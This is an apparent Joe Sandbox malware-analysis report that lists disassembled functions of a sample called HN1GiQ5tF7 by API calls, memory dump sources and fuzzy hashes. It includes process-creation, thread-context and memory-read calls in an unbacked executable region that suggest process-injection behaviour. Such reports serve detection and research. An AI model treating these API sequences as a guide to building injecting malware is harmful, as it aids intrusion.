Instruction Fuzzy Hash: 4111EB70A003169FDB52BF709C4266E36E7AF05791F158819FC15C7381FA30CB199761

Function 0064D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0064D28B,SwapMouseButtons,00000004,?), ref: 0064D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0064D28B,SwapMouseButtons,00000004,?,?,?,?,0064C865), ref: 0064D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0064D28B,SwapMouseButtons,00000004,?,?,?,?,0064C865), ref: 0064D2FF

Strings

Control Panel\Mouse, xrefs: 0064D2BA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 79e6289909fc40a236d39f3e22cd00ef95c60da63086dff67f7296e707cd6fd6
Instruction ID: 42c45acfedb01a61b19ff21601cb25890dabfbdf8d81671486110f679f5a0c2a
Opcode Fuzzy Hash: 79e6289909fc40a236d39f3e22cd00ef95c60da63086dff67f7296e707cd6fd6
Instruction Fuzzy Hash: 911179B5A11208BFDB228FA4CC84EEF7BBAEF05744F004569E901D7210E671EE41AB60

Function 012F6068 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 012F6823
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012F68B9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012F68DB

Memory Dump Source

Source File: 00000000.00000002.1270023088.00000000012F4000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f4000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction ID: e1ba9f0554322b38bb180dfc8e920efbacccb302ebad68e2220c7fedf2420f5c
Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction Fuzzy Hash: 21620D30A242599BEB24CFA4C851BDEB771EF58300F1091ADD20DEB390E7769E85CB59

Function 0067C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00634517: _fseek.LIBCMT ref: 0063452F

Part of subcall function 0067C56D: _wcscmp.LIBCMT ref: 0067C65D
Part of subcall function 0067C56D: _wcscmp.LIBCMT ref: 0067C670

_free.LIBCMT ref: 0067C4DD
_free.LIBCMT ref: 0067C4E4
_free.LIBCMT ref: 0067C54F

Part of subcall function 00651C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00657A85), ref: 00651CB1
Part of subcall function 00651C9D: GetLastError.KERNEL32(00000000,?,00657A85), ref: 00651CC3

_free.LIBCMT ref: 0067C557

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
Instruction ID: 37934a898777821cea384566ead3caca82bfb03ee57a3d6c407de49832344402
Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
Instruction Fuzzy Hash: 66515DB1904218AFDF54DF64DC81BADBBBAEF48314F1040AEF61DA7241DB716A908F58

Function 0064EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064EBB2

Part of subcall function 006351AF: _memset.LIBCMT ref: 0063522F
Part of subcall function 006351AF: _wcscpy.LIBCMT ref: 00635283
Part of subcall function 006351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00635293

KillTimer.USER32(?,00000001,?,?), ref: 0064EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0064EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006A3C88

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 0d3e3ed77bf7dff284e93c44df6ca9dcd07312b2ad75acef61df0bb06a6fca5b
Instruction ID: 042f06ad931c5899347fcadc3ac5706ed81a91668e8bc0230002b992e29324b6
Opcode Fuzzy Hash: 0d3e3ed77bf7dff284e93c44df6ca9dcd07312b2ad75acef61df0bb06a6fca5b
Instruction Fuzzy Hash: E12137709047909FE7329B288C59BE7BBEEAB02318F00008DE29B5A341C7702E84CB51

Function 0067C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0067C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0067C746

Strings

aut, xrefs: 0067C740

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 6ded150aca9c44e7aa90c380734ebd49cce05efb32bc6d6034a37a4405070b9d
Instruction ID: 6dd1a1a11bec3346bc339c1639cd5de5b0e885c2624560723e97878981a7b380
Opcode Fuzzy Hash: 6ded150aca9c44e7aa90c380734ebd49cce05efb32bc6d6034a37a4405070b9d
Instruction Fuzzy Hash: 67D05EB150030EAFDB20AB90DC0EF8A776D9700704F0002A07750A90B2EBB0E7D98B54

Function 0068F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846900b28c80b776d62d5ac56085c7a20798236ac0b613d1476f0d38f49df52f
Instruction ID: b88af081a9ab078583201a5e8b9a7c559ab7e155291b5af319a3adf875c4ac0d
Opcode Fuzzy Hash: 846900b28c80b776d62d5ac56085c7a20798236ac0b613d1476f0d38f49df52f
Instruction Fuzzy Hash: E7F15A716043019FCB50EF24C891B5AB7E6FF88314F148A2DF9999B392D771E945CB82

Function 00634FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00635022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 006350CB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 7e51f6b35bb73ab971f991f93469a1560a729c8fcf8200be4179d1478843ec18
Instruction ID: 3fed12e4b332a2d83e86e3fa794dd44f305fe3bce2d53ca5dbd89aa5ca984576
Opcode Fuzzy Hash: 7e51f6b35bb73ab971f991f93469a1560a729c8fcf8200be4179d1478843ec18
Instruction Fuzzy Hash: 07318EB0504701CFD725EF24D8456ABBBE9FF49304F00092EF59A87351E772A944CB96

Function 0065395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00653973

Part of subcall function 006581C2: __NMSG_WRITE.LIBCMT ref: 006581E9
Part of subcall function 006581C2: __NMSG_WRITE.LIBCMT ref: 006581F3

__NMSG_WRITE.LIBCMT ref: 0065397A

Part of subcall function 0065821F: GetModuleFileNameW.KERNEL32(00000000,006F0312,00000104,00000000,00000001,00000000), ref: 006582B1
Part of subcall function 0065821F: ___crtMessageBoxW.LIBCMT ref: 0065835F

Part of subcall function 00651145: ___crtCorExitProcess.LIBCMT ref: 0065114B
Part of subcall function 00651145: ExitProcess.KERNEL32 ref: 00651154

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

RtlAllocateHeap.NTDLL(012B0000,00000000,00000001,00000001,00000000,?,?,0064F507,?,0000000E), ref: 0065399F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 71badc5c0c833eb51f51657b6151857c5e914638839275c27f5265407eb89a93
Instruction ID: 0941a002bd1ca56b36bfc4d42619c6a7a6060dce300e524ab2a7d4d583ecb6b2
Opcode Fuzzy Hash: 71badc5c0c833eb51f51657b6151857c5e914638839275c27f5265407eb89a93
Instruction Fuzzy Hash: 0C019BB62456215EE7613B24EC4276D234B9B82B92F211129FD05DB382FBF09D4986A4

Function 0067C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0067C385,?,?,?,?,?,00000004), ref: 0067C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0067C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0067C708
CloseHandle.KERNEL32(00000000,?,0067C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0067C70F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: d25c9e51f7a11979d6f9c466c21e2d93fff7d3e98c672194af625c6017119fc9
Instruction ID: fd4fef508ecd207de1fa21735bd6877f4dea06d9a106599c3e2b4d546600c7e4
Opcode Fuzzy Hash: d25c9e51f7a11979d6f9c466c21e2d93fff7d3e98c672194af625c6017119fc9
Instruction Fuzzy Hash: EBE08632140214B7D7211B58AC09FCA7B5AAB05770F144210FB147D0E1A7B125518798

Function 0067BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0067BB72

Part of subcall function 00651C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00657A85), ref: 00651CB1
Part of subcall function 00651C9D: GetLastError.KERNEL32(00000000,?,00657A85), ref: 00651CC3

_free.LIBCMT ref: 0067BB83
_free.LIBCMT ref: 0067BB95

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 671c4c2d6b3831f463b4da89d3553e4c9e38553e3e27ef9aff1803e25344103c
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: A9E0C2A120070182CA2065386E48FF313CD0F05712B04180EBC1DEB242CF28F84084A8

Function 00632322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 006322A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006324F1), ref: 00632303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006325A1
CoInitialize.OLE32(00000000), ref: 00632618
CloseHandle.KERNEL32(00000000), ref: 006A503A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 8ce63d0e94768170db2a2098c349047cadf22c8cc8c70bcb043bd157271ad735
Instruction ID: 1e823cee143314fc5da9aa5b561b7057fe50ff1ebb3521d6114996adeff6b9bb
Opcode Fuzzy Hash: 8ce63d0e94768170db2a2098c349047cadf22c8cc8c70bcb043bd157271ad735
Instruction Fuzzy Hash: A97190B5901285CBC744DFAAA9914B5BBE7BBAB3C4790612ED119CF371CB314680CF58

Function 00633A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00633A73

Part of subcall function 00651405: __lock.LIBCMT ref: 0065140B

Part of subcall function 00633ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00633AF3
Part of subcall function 00633ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00633B08

Part of subcall function 00633D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00633AA3,?), ref: 00633D45
Part of subcall function 00633D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00633AA3,?), ref: 00633D57
Part of subcall function 00633D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,006F1148,006F1130,?,?,?,?,00633AA3,?), ref: 00633DC8
Part of subcall function 00633D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00633AA3,?), ref: 00633E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00633AB3

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 9f22a17daded1277dbd7f443bb628209f77f5e9ae740950d1ffa54cef4770037
Instruction ID: 1be67e626055bff6805c6fdff22dc9bb4e115f5e781119e61420fed94971f113
Opcode Fuzzy Hash: 9f22a17daded1277dbd7f443bb628209f77f5e9ae740950d1ffa54cef4770037
Instruction Fuzzy Hash: E811C071908341DBC300EF25E84595ABBEAEF95350F00991EF9858B2A1DF708544CF96

Function 0065E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0065EA29
__close_nolock.LIBCMT ref: 0065EA42

Part of subcall function 00657BDA: __getptd_noexit.LIBCMT ref: 00657BDA

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 456f305d808ac500aabdc97dd2a593596cf5ae70cfc3ee4d5b99a5c2bc7ec30a
Instruction ID: ae0bbdeb4f0b87a9a6557c8d831f337d63e4bc447c664a1f809bb1f535ec51b1
Opcode Fuzzy Hash: 456f305d808ac500aabdc97dd2a593596cf5ae70cfc3ee4d5b99a5c2bc7ec30a
Instruction Fuzzy Hash: D61173728056509EEB56BF74D8423587A536F82333F164348EC215F2E3CBB58A49C6A9

Function 0064F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0065395C: __FF_MSGBANNER.LIBCMT ref: 00653973
Part of subcall function 0065395C: __NMSG_WRITE.LIBCMT ref: 0065397A
Part of subcall function 0065395C: RtlAllocateHeap.NTDLL(012B0000,00000000,00000001,00000001,00000000,?,?,0064F507,?,0000000E), ref: 0065399F

std::exception::exception.LIBCMT ref: 0064F51E
__CxxThrowException@8.LIBCMT ref: 0064F533

Part of subcall function 00656805: RaiseException.KERNEL32(?,?,0000000E,006E6A30,?,?,?,0064F538,0000000E,006E6A30,?,00000001), ref: 00656856

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 5db593fa388baf5a2c99e9c0058dbdbcc57ad9218dd2491f3d66e51e3be69da6
Instruction ID: 564824da079a91e88397f069b640edc480418f4edef8b83811203a620f050f16
Opcode Fuzzy Hash: 5db593fa388baf5a2c99e9c0058dbdbcc57ad9218dd2491f3d66e51e3be69da6
Instruction Fuzzy Hash: 7DF0A47110421DA7D744BF98D8019DE7BEB9F01355F604039FD04A6181DFB0968487B9

Function 006535E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

__lock_file.LIBCMT ref: 00653629

Part of subcall function 00654E1C: __lock.LIBCMT ref: 00654E3F

__fclose_nolock.LIBCMT ref: 00653634

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 4f170cde63a32974d7186185c07014196ae89cb1d40fd54a7192fab69a8f1550
Instruction ID: bfc08e53f05e0322172ad582af972d6fc43011849bf119ee8323ce217e24ba50
Opcode Fuzzy Hash: 4f170cde63a32974d7186185c07014196ae89cb1d40fd54a7192fab69a8f1550
Instruction Fuzzy Hash: E5F0B471801324AAD7527B65C80276E7AA36F41B76F65810CFC21AB3C1CB7C8B09DF59

Function 012F6065 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 012F6823
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012F68B9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012F68DB

Memory Dump Source

Source File: 00000000.00000002.1270023088.00000000012F4000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f4000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 7ff5cee0d5181009ec889dcd9179d8b0ffde7e0ddf1009dc754d59749aeb7d96
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: 7A12CC24E24658C6EB24DF64D8507DEB232EF68300F1090ED910DEB7A5E77A4F85CB5A

Function 00652957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00652A0B

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 77831cf7b4f9e9b30176ee9e00d3e659d0d62fa1f854627c365ead823513dbde
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 6741C3717007079FDF288EAAC8A15AE7BA7AF46362F24852DEC45C7340EB70DD498B44

Function 0064ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0064EDC7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

